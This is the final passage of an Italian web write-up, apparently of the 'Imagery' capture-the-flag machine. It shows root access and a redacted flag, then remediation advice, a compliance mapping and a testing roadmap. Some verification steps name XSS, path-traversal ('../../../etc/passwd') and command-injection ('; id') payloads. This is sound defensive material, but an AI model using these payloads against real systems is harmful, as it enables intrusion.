<span class="nv">uid</span><span class="o">=</span><span class="m">0</span><span class="o">(</span>root<span class="o">)</span><span class="w"> </span><span class="nv">gid</span><span class="o">=</span><span class="m">0</span><span class="o">(</span>root<span class="o">)</span><span class="w"> </span><span class="nv">groups</span><span class="o">=</span><span class="m">0</span><span class="o">(</span>root<span class="o">)</span>
</code></pre></div>
<h4 id="root-flag"><strong>Root Flag</strong><a class="headerlink" href="#root-flag" title="Permanent link">&para;</a></h4>
<div class="highlight"><pre><span></span><code>root@imagery:~#<span class="w"> </span>cat<span class="w"> </span>/root/root.txt
<span class="o">[</span>ROOT_FLAG_REDACTED<span class="o">]</span>
</code></pre></div>
<hr />
<h2 id="5-remediation-hardening-proposte">5. Remediation &amp; Hardening (Proposte)<a class="headerlink" href="#5-remediation-hardening-proposte" title="Permanent link">&para;</a></h2>
<h3 id="51-mitigazione-delle-vulnerabilita-identificate">5.1 Mitigazione delle Vulnerabilità Identificate<a class="headerlink" href="#51-mitigazione-delle-vulnerabilita-identificate" title="Permanent link">&para;</a></h3>
<h4 id="511-cross-site-scripting-xss-owasp-a072021"><strong>5.1.1 Cross-Site Scripting (XSS) – OWASP A07:2021</strong><a class="headerlink" href="#511-cross-site-scripting-xss-owasp-a072021" title="Permanent link">&para;</a></h4>
<p><strong>Remediazione Primaria:</strong>
- Implementare Content Security Policy (CSP) header a livello applicativo:
  <div class="highlight"><pre><span></span><code><span class="err">Content-Security-Policy: default-src &#39;self&#39;; script-src &#39;self&#39;; object-src &#39;none&#39;;</span>
</code></pre></div>
- Sanitizzare ALL user input utilizzando libreria affidabile (es. <code>bleach</code> per Python):
  <div class="highlight"><pre><span></span><code><span class="kn">from</span><span class="w"> </span><span class="nn">bleach</span><span class="w"> </span><span class="kn">import</span> <span class="n">clean</span>
<span class="n">user_input</span> <span class="o">=</span> <span class="n">clean</span><span class="p">(</span><span class="n">user_submission</span><span class="p">,</span> <span class="n">tags</span><span class="o">=</span><span class="p">[],</span> <span class="n">strip</span><span class="o">=</span><span class="kc">True</span><span class="p">)</span>
</code></pre></div>
- Implementare HTTP-only flag su cookie di sessione:
  <div class="highlight"><pre><span></span><code><span class="n">app</span><span class="o">.</span><span class="n">config</span><span class="p">[</span><span class="s1">&#39;SESSION_COOKIE_HTTPONLY&#39;</span><span class="p">]</span> <span class="o">=</span> <span class="kc">True</span>
<span class="n">app</span><span class="o">.</span><span class="n">config</span><span class="p">[</span><span class="s1">&#39;SESSION_COOKIE_SECURE&#39;</span><span class="p">]</span> <span class="o">=</span> <span class="kc">True</span>  <span class="c1"># HTTPS only</span>
</code></pre></div></p>
<p><strong>Controllo di Verifica:</strong>
- Penetration test con payload XSS comune (es. <code>&lt;script&gt;alert('xss')&lt;/script&gt;</code>) → Non deve eseguire</p>
<hr />
<h4 id="512-local-file-inclusion-lfi-owasp-a012021-cwe-22"><strong>5.1.2 Local File Inclusion (LFI) – OWASP A01:2021 / CWE-22</strong><a class="headerlink" href="#512-local-file-inclusion-lfi-owasp-a012021-cwe-22" title="Permanent link">&para;</a></h4>
<p><strong>Remediazione Primaria:</strong>
- Implementare <strong>hardcoded whitelist</strong> di file permessi:
  <div class="highlight"><pre><span></span><code><span class="n">ALLOWED_LOGS</span> <span class="o">=</span> <span class="p">{</span>
    <span class="s1">&#39;admin&#39;</span><span class="p">:</span> <span class="s1">&#39;/var/logs/admin.log&#39;</span><span class="p">,</span>
    <span class="s1">&#39;system&#39;</span><span class="p">:</span> <span class="s1">&#39;/var/logs/system.log&#39;</span><span class="p">,</span>
    <span class="s1">&#39;audit&#39;</span><span class="p">:</span> <span class="s1">&#39;/var/logs/audit.log&#39;</span>
<span class="p">}</span>

<span class="n">requested_file</span> <span class="o">=</span> <span class="n">ALLOWED_LOGS</span><span class="o">.</span><span class="n">get</span><span class="p">(</span><span class="n">request</span><span class="o">.</span><span class="n">args</span><span class="o">.</span><span class="n">get</span><span class="p">(</span><span class="s1">&#39;file&#39;</span><span class="p">))</span>
<span class="k">if</span> <span class="ow">not</span> <span class="n">requested_file</span><span class="p">:</span>
    <span class="n">abort</span><span class="p">(</span><span class="mi">403</span><span class="p">)</span>
</code></pre></div>
- <strong>Mai</strong> concatenare input direttamente in path file</p>
<p><strong>Controllo di Verifica:</strong>
- Tentare path traversal (<code>../../../etc/passwd</code>) → Deve fallare con 403</p>
<hr />
<h4 id="513-os-command-injection-owasp-a032021-cwe-78"><strong>5.1.3 OS Command Injection – OWASP A03:2021 / CWE-78</strong><a class="headerlink" href="#513-os-command-injection-owasp-a032021-cwe-78" title="Permanent link">&para;</a></h4>
<p><strong>Remediazione Primaria (OBBLIGATORIA):</strong>
- <strong>Evitare <code>os.system()</code> / <code>shell=True</code></strong> – Usare <code>subprocess</code> con <code>shell=False</code>:
  <div class="highlight"><pre><span></span><code><span class="c1"># VULNERABILE ❌</span>
<span class="n">os</span><span class="o">.</span><span class="n">system</span><span class="p">(</span><span class="sa">f</span><span class="s2">&quot;convert </span><span class="si">{</span><span class="n">image_path</span><span class="si">}</span><span class="s2"> -crop </span><span class="si">{</span><span class="n">crop</span><span class="si">}</span><span class="s2">&quot;</span><span class="p">)</span>

<span class="c1"># SICURO ✓</span>
<span class="n">subprocess</span><span class="o">.</span><span class="n">run</span><span class="p">([</span>
    <span class="s1">&#39;convert&#39;</span><span class="p">,</span> <span class="n">image_path</span><span class="p">,</span>
    <span class="s1">&#39;-crop&#39;</span><span class="p">,</span> <span class="n">crop_string</span>
<span class="p">],</span> <span class="n">check</span><span class="o">=</span><span class="kc">True</span><span class="p">)</span>
</code></pre></div>
- Input validation con whitelist ristretta (solo numeri per crop params):
  <div class="highlight"><pre><span></span><code><span class="n">crop_params</span> <span class="o">=</span> <span class="p">[</span><span class="nb">int</span><span class="p">(</span><span class="n">x</span><span class="p">)</span> <span class="k">for</span> <span class="n">x</span> <span class="ow">in</span> <span class="n">data</span><span class="p">[</span><span class="s1">&#39;crop_params&#39;</span><span class="p">]]</span>  <span class="c1"># Forza integer</span>
</code></pre></div></p>
<p><strong>Controllo di Verifica:</strong>
- Command injection classico (<code>; id</code>) → Non deve eseguire</p>
<hr />
<h4 id="514-weak-password-storage-cwe-916"><strong>5.1.4 Weak Password Storage – CWE-916</strong><a class="headerlink" href="#514-weak-password-storage-cwe-916" title="Permanent link">&para;</a></h4>
<p><strong>Remediazione Primaria:</strong>
- Eliminare MD5: implementare <strong>PBKDF2 / bcrypt / Argon2</strong>:
  <div class="highlight"><pre><span></span><code><span class="kn">from</span><span class="w"> </span><span class="nn">werkzeug.security</span><span class="w"> </span><span class="kn">import</span> <span class="n">generate_password_hash</span><span class="p">,</span> <span class="n">check_password_hash</span>

<span class="n">password_hash</span> <span class="o">=</span> <span class="n">generate_password_hash</span><span class="p">(</span><span class="n">password</span><span class="p">,</span> <span class="n">method</span><span class="o">=</span><span class="s1">&#39;pbkdf2:sha256&#39;</span><span class="p">)</span>
</code></pre></div>
- Database: applicare <strong>salting</strong> automatico (standard in werkzeug)</p>
<hr />
<h4 id="515-unauthorized-admin-access-cwe-639"><strong>5.1.5 Unauthorized Admin Access – CWE-639</strong><a class="headerlink" href="#515-unauthorized-admin-access-cwe-639" title="Permanent link">&para;</a></h4>
<p><strong>Remediazione Primaria:</strong>
- Implementare <strong>role-based access control (RBAC)</strong>:
  <div class="highlight"><pre><span></span><code><span class="nd">@app</span><span class="o">.</span><span class="n">route</span><span class="p">(</span><span class="s1">&#39;/admin&#39;</span><span class="p">)</span>
<span class="k">def</span><span class="w"> </span><span class="nf">admin_panel</span><span class="p">():</span>
    <span class="k">if</span> <span class="n">session</span><span class="o">.</span><span class="n">get</span><span class="p">(</span><span class="s1">&#39;role&#39;</span><span class="p">)</span> <span class="o">!=</span> <span class="s1">&#39;admin&#39;</span><span class="p">:</span>
        <span class="n">abort</span><span class="p">(</span><span class="mi">403</span><span class="p">,</span> <span class="s2">&quot;Insufficient privileges&quot;</span><span class="p">)</span>
</code></pre></div>
- Aggiungere logging di ALL admin actions per audit</p>
<hr />
<h4 id="516-sudo-misuse-cwe-269"><strong>5.1.6 Sudo Misuse – CWE-269</strong><a class="headerlink" href="#516-sudo-misuse-cwe-269" title="Permanent link">&para;</a></h4>
<p><strong>Remediazione Primaria:</strong>
- Revoke unnecessary SUID bits:
  <div class="highlight"><pre><span></span><code>chmod<span class="w"> </span>-s<span class="w"> </span>/usr/local/bin/charcol
</code></pre></div>
- Se necessario, implementare <strong>cronjob con esecuzione limitata</strong> (es. solo durante manutenzione schedulata, con approval)
- Implementare <strong>sudoers logging</strong>:
  <div class="highlight"><pre><span></span><code><span class="c1"># /etc/sudoers</span>
Defaults<span class="w"> </span><span class="nv">logfile</span><span class="o">=</span><span class="s2">&quot;/var/log/sudo.log&quot;</span>
Defaults<span class="w"> </span>log_input,<span class="w"> </span>log_output
</code></pre></div></p>
<hr />
<h3 id="52-compliance-standards-mapping">5.2 Compliance &amp; Standards Mapping<a class="headerlink" href="#52-compliance-standards-mapping" title="Permanent link">&para;</a></h3>
<p><strong>NIST SP 800-115 (Technical Security Testing):</strong>
- SI-2: Flaw Remediation ← SI.C Applied
- SI-6: Security Testing, Monitoring, and Analysis ← SI.C-2
- AC-2: Account Management ← AC.2-2 (Weak password policy)</p>
<p><strong>OWASP SAMM (Security Assurance Maturity Model):</strong>
- <strong>V-SM</strong>: Secure Architecture &amp; Design Review → HIGH priority
- <strong>T-CR</strong>: Code Review for Security Issues → HIGH priority
- <strong>O-PM</strong>: Policy &amp; Compliance Management → MEDIUM priority</p>
<hr />
<h3 id="53-testing-validation-roadmap">5.3 Testing &amp; Validation Roadmap<a class="headerlink" href="#53-testing-validation-roadmap" title="Permanent link">&para;</a></h3>
<table>
<thead>
<tr>
<th>Priority</th>
<th>Control</th>
<th>Testing Method</th>
<th>Expected Result</th>
</tr>
</thead>
<tbody>
<tr>
<td><strong>CRITICAL</strong></td>
<td>Input sanitization (XSS/Injection)</td>
<td>Automated SAST, Manual code review</td>
<td>All payloads blocked</td>
</tr>
<tr>
<td><strong>CRITICAL</strong></td>
<td>File access control (LFI)</td>
<td>Burp Suite intruder, manual path traversal</td>
<td>403 on unauthorized paths</td>
</tr>
<tr>
<td><strong>CRITICAL</strong></td>
<td>Command execution isolation</td>
<td>Unit test subprocess calls, no shell=True</td>
<td>All cmds fail without subprocess parameter</td>
</tr>
<tr>
<td><strong>HIGH</strong></td>
<td>Password hashing strength</td>
<td>Test hash cracking (hashcat)</td>
<td>Minimum 8-hour crack time (Argon2)</td>
</tr>
<tr>
<td><strong>HIGH</strong></td>
<td>RBAC enforcement</td>
<td>Manual session hijacking simulation</td>
<td>Privilege escalation impossible</td>
</tr>
<tr>
<td><strong>HIGH</strong></td>
<td>Sudo/SUID auditing</td>
<td><code>find / -perm -4000</code> monthly, sudo log review</td>
<td>No unnecessary SUID bits</td>
</tr>
</tbody>
</table>
<hr />
<h2 id="6-conclusioni">6. Conclusioni<a class="headerlink" href="#6-conclusioni" title="Permanent link">&para;</a></h2>
<p>Questo assessment ha dimostrato come <strong>molteplici vulnerabilità OWASP Top 10</strong>, se combinate, possono permettere un attacco progressivo dall'accesso anonimo alla compromissione totale del sistema. L'applicazione web "Imagery" ha violato principi fondamentali di:</p>
<ol>
<li><strong>Input Validation</strong> → Sia XSS che Command Injection avrebbero potuto essere prevenute</li>
<li><strong>Output Encoding</strong> → Mancata neutralizzazione di dati controllati dall'utente</li>
<li><strong>Least Privilege</strong> → Credenziali plain text in database, SUID injudicato</li>
<li><strong>Access Control</strong> → Assenza di RBAC su endpoint admin</li>
</ol>
<hr />
<p><strong>Note Finali:</strong></p>
<p>Questa macchina dimostra come una cascata di vulnerabilità (XSS → LFI → Credential leak → RCE → Priv escalation) possa portare da accesso anonimo a root totale. La mitigazione richiede fix a più livelli: input sanitization, access control, package updates.</p>












                
              </article>
            </div>
          
          
<script>var target=document.getElementById(location.hash.slice(1));target&&target.name&&(target.checked=target.name.startsWith("__tabbed_"))</script>
        </div>
        
      </main>
      
        <footer class="md-footer">
  
  <div class="md-footer-meta md-typeset">
    <div class="md-footer-meta__inner md-grid">
      <div class="md-copyright">
  
  
    Made with
    <a href="https://squidfunk.github.io/mkdocs-material/" target="_blank" rel="noopener">
      Material for MkDocs
    </a>
  
</div>
      
    </div>
  </div>
</footer>
      
    </div>
    <div class="md-dialog" data-md-component="dialog">
      <div class="md-dialog__inner md-typeset"></div>
    </div>
    
    
    
      
      
      <script id="__config" type="application/json">{"annotate": null, "base": "..", "features": ["navigation.instant", "navigation.tracking", "navigation.tabs", "navigation.tabs.sticky", "toc.follow", "content.code.copy", "content.code.select", "search.suggest", "search.highlight"], "search": "../assets/javascripts/workers/search.2c215733.min.js", "tags": null, "translations": {"clipboard.copied": "Copied to clipboard", "clipboard.copy": "Copy to clipboard", "search.result.more.one": "1 more on this page", "search.result.more.other": "# more on this page", "search.result.none": "No matching documents", "search.result.one": "1 matching document", "search.result.other": "# matching documents", "search.result.placeholder": "Type to start searching", "search.result.term.missing": "Missing", "select.version": "Select version"}, "version": null}</script>
    
    
      <script src="../assets/javascripts/bundle.79ae519e.min.js"></script>
      
    
  </body>
</html>